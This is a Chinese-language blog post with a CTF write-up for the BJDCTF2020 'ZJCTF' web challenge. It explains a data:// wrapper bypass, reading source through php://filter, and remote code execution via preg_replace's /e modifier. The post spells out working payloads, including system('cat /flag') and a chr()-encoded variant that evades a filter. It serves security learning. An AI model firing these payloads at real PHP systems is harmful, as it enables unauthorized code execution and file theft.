[BJDCTF2020]ZJCTF,不过如此 preg_replace /e模式漏洞

于 2023-09-11 01:00:30 发布
阅读量386 收藏 1
点赞数
分类专栏: BUUctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/132797583
版权

 

目录

preg_replace的/e模式

为什么要变为 {${phpinfo()}}

另一个方法

版本

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

直接看看代码

首先 text file获取参数

判断 text为空 和 读取 text的文件内容 并且要为 I have a dream

这里可以使用data伪协议绕过 让 text识别到 I have a dream
本地测试一下就知道了

通过 data获取 I have a dream 得到该数据 这样 就可以绕过判断

然后文件包含 提示我们 next.php

include很显然就是使用伪协议 我们直接php://来读取

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

 解密

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
访问期间全局保存 id


function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
这里很关键

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
将get的值 作为 re->str类型  

function getFlag(){
	@eval($_GET['cmd']);
}
执行命令

我们看看其中关键的内容

preg_replace的/e模式

这里主要是使用了 prg_replace的危险参数 /e

可执行参数

就可以将第二个参数作为命令执行

所以上面其实 就是匹配

'/(' . $re . ')/ei',    'strtolower("\\1")',


就是 eval(strtolower("\\1"))

但是 \\1 在正则中存在自己的作用

其实就是匹配第一项

这里给出例子

 preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);

regex是我们的参数值 即 get的名称  value是传入的参数

.*=phpinfo()


所以就变为了

 preg_replace('/(.*)/ei', 'strtolower("\\1")',phpinfo());

但是这里是无法执行phpinfo()的

为什么要变为 {${phpinfo()}}

首先我们要知道

$a=hello

$$a=world   

这里相当于 

$hello=world


所以

echo $a $hello

为

hello world

我们接着理解一下

${phpinfo()}

执行完会变为 ${1} 因为 phpinfo()通过var_dump返回的是1

所以strtolower 变为 strtolower({${1}})

接着变为 strtolower({null}) 


这里还存在一个问题

如果我们输入 ?.*

作为 get的名字的话

无法执行

因为对于get非法参数会自动替换为 _

但是我们如果输入 一个大写字母就可以实现 

例如 ?.* ---> ?_*

    ?\S* ---> ?\S*

使用了其他正则

就是 \S 匹配非空

这道题我们需要执行 getFlag

所以我们修改 参数

这里我们需要了解 主要是要让第二个参数 作为命令执行

preg_replace(正则,需要执行的命令,原本的值)

我们现在需要

strtolower("\1")为我们的"原本的值"来作为命令执行

而strtolower("\1")要为命令 就需要原本的值是命令

而我们需要通过${phpinfo()}直接执行 phpinfo()

这里执行完phpinfo() 就会变为strtolower("${phpinfo()}")-->strtolower("${1}")-->null

 这里说太多了 主要就是让第二个参数为 phpinfo即可

我们需要通过 ${}来解析phpinfo() 否则还是无法执行命令

next.php?\S*={${getFlag()}}&cmd=system('cat /flag');

这里flag就出来了

这里主要理解 ${phpinfo()}

我们不在意匹配后的字符串是什么

而是沟通过${}来直接解析phpinfo()

另一个方法

这里既然我们可以通过 第二个参数直接解析那我们直接替换为命令即可

我们直接通过 system("cat /flag"); 看看能不能执行

发现报错了 说明存在过滤

我们直接通过 chr拼接字符即可

?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}


system(cat /flag)

执行成功

获得flag

版本

/e模式在php5.5.x版本已经弃用了,但是根据我实验,在5.6.9版本下,虽然会报错,但是还能够使用这个特性

 7.0之后的版本就不能用

[BJDCTF2020]ZJCTF,不过如此_[bjdctf2020]zjctf,不过如此_Sk1y的博客-CSDN博客

双层小牛堡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换...
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
在编写PHP模板引擎工具类时,以前常用的一个正则替换函数为 preg_replace(),加上正则修饰符 /e,就能够执行强大的回调函数,实现模板引擎编译(其实就是字符串替换)。 详情介绍参考博文:PHP函数preg_replace() ...
php命令执行函数
l578900的博客
11-04 471
①system() ②exec() ③shell_exec() ④passthru() ⑤popen() ⑥反引号` ` 2、php代码执行函数 ①eval(),必须以分号结尾 ②assert() ③grep_replace() 对字符串进行正则匹配后的替换,当正则部分存在e修饰符,替换内容就会被当成代码执行,因为/e修饰符本身有自动转译的功能 ④call_user_func() 回调函数 ⑤动态函数$a($b) ...
关于preg_replace \e的代码执行
m0_64815693的博客
04-23 1573
关于preg_replace \e的代码执行
深入研究preg_replace \e模式下的代码执行
paidx0
08-21 2517
深入研究preg_replace与代码执行 下面将深入研究 preg_replace /e 模式下的代码执行问题, 其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常非常多,相信看完你也能学到很多 案例分析 <?php function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")',
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 203
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行
[BJDCTF2020]ZJCTF不过如此
SopRomeo的博客
06-05 2188
先看到第一个if 要求写个句子 用data伪协议来写 ?text=data:text/plain,I have a dream 包含一下next.php file=php://filter/read=convert.base64-encode/resource=next.php next.php源码如下 很明显要我们绕过那个正则匹配, 然后执行eval()函数 而我们哟啊执行eval()函数,就是要通过getFlag()这个函数,而怎么取调用呢? 把那个正则匹配表达式往上面一搜 /e模式漏洞 .
详解PHP正则表达式替换实现(PHP preg_replace,PHP preg_replace)
01-19
preg_replace执行正则表达式的搜索和替换 mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) preg_replace:允许你替换字符串中匹配到你定义的正则表达式。 一个简单的...
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞
qq_54929891的博客
03-06 2602
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
preg_replace与远程代码执行
m0_62422842的博客
04-01 3922
前言 之前在攻防世界上随便做了个题,发现了这个陌生的preg_replace函数\e情况下的漏洞。像我这种对这陌生的小白来说第一次理解是比较困难的。花了两天时间看了许多师傅的文章,这才理解。为此写下这篇文章总结一下,也希望后上路的小伙伴能看了我的文章能有所收获。 preg_replace函数 这个php函数是通过正则替换用的,基本形式为 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject ) pr
php代码审计命令执行,代码审计-通过preg_replace函数深入命令执行
weixin_42417004的博客
03-27 350
代码审计day1前言最近开始学习代码审计,刚好mochazz学长的团队红日安全-代码审计小组正在做一个PHP代码审计的项目,该项目会对一道题目进行细致的分析,我觉得很适合新手学习,就跟进他们的项目,对项目中的题目写出我自己的想法。希望能有所进步。题目1这道题的名字叫做蜡烛12345678910111213141516...
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 489
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
c语言开发图书管理系统项目源码+数据+可运行程序
05-01
c语言开发图书管理系统项目源码+数据+可运行程序 主要功能有:1、以管理员或读者不同身份注册账户。2、登录、找回密码、修改密码。3、管理员:图书入库,清除库存,统计书籍数量,统计读者借书情况,在馆书籍排序,读者排序。4、读者:查看个人借阅信息,借书,还书,按书名、作者、出版社检索图书,查询全部在馆图书。
基于transformer的多模态脑肿瘤分割.zip
05-01
本项目旨在利用Transformer模型实现多模态脑肿瘤分割。多模态脑肿瘤分割对于脑肿瘤的诊断和治疗具有重要意义。 我们采用Transformer模型,通过分析脑部MRI、CT、PET等不同模态的医学影像数据,实现对脑肿瘤区域的自动分割。项目使用的数据集包括公开的脑肿瘤影像数据集,如BRATS、Medical Segmentation Decathlon等,并进行了预处理,包括图像增强、分割和特征提取等。 在运行环境方面,我们使用Python编程语言,基于TensorFlow、PyTorch等深度学习框架进行开发。为了提高计算效率,我们还使用了GPU加速计算。此外,我们还采用了Docker容器技术,确保实验结果的可重复性。 项目完成后,将实现对多模态脑肿瘤的快速、准确分割,为脑肿瘤的诊断和治疗提供有力支持。同时,项目成果也可应用于其他医学影像分析领域。
马尔文高浓度池说明书 High Concentration Cell (ZEN1010)
05-01
马尔文高浓度池说明书 High Concentration Cell (ZEN1010)
如何提高APP商业变现能力.docx
05-01
如何提高APP商业变现能力.docx
node-v12.20.0-darwin-x64.tar.xz
05-01
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
R语言绘制SCI科研生存ROC曲线源代码.zip
最新发布
05-01
把input里面的数据替换成自己的数据,打开R,点Run,可以直接出图!文件适合有R语言基础的同学。
高电压技术(第三版)课后习题答案
05-01
高电压技术(第三版)课后习题答案
preg_replace_all
06-06
在 PHP 中,并没有 `preg_replace_all` 这个函数。可能是您误解了 `preg_replace` 函数的作用。`preg_replace` 函数会在字符串中使用正则表达式进行替换,并返回替换后的字符串。如果要替换所有匹配项,可以使用 `preg_replace` 函数的第四个参数 `$count`,将其设置为 `$count = -1`,表示替换所有匹配项。 例如,下面的代码将会把字符串中的所有数字替换成字符串 "num": ```php $str = "12345"; $newStr = preg_replace("/\d+/", "num", $str, -1); echo $newStr; // 输出:num ``` 注意,`preg_replace` 函数不会改变原始字符串 `$subject`,而是返回一个新的字符串。如果要直接替换原始字符串,可以将 `$subject` 传入函数引用参数。 例如,下面的代码将会把字符串中的 "world" 替换成 "PHP": ```php $str = "Hello world"; preg_replace("/world/", "PHP", $str, -1, $count); echo $str; // 输出:Hello PHP ``` 请问您还有什么问题吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值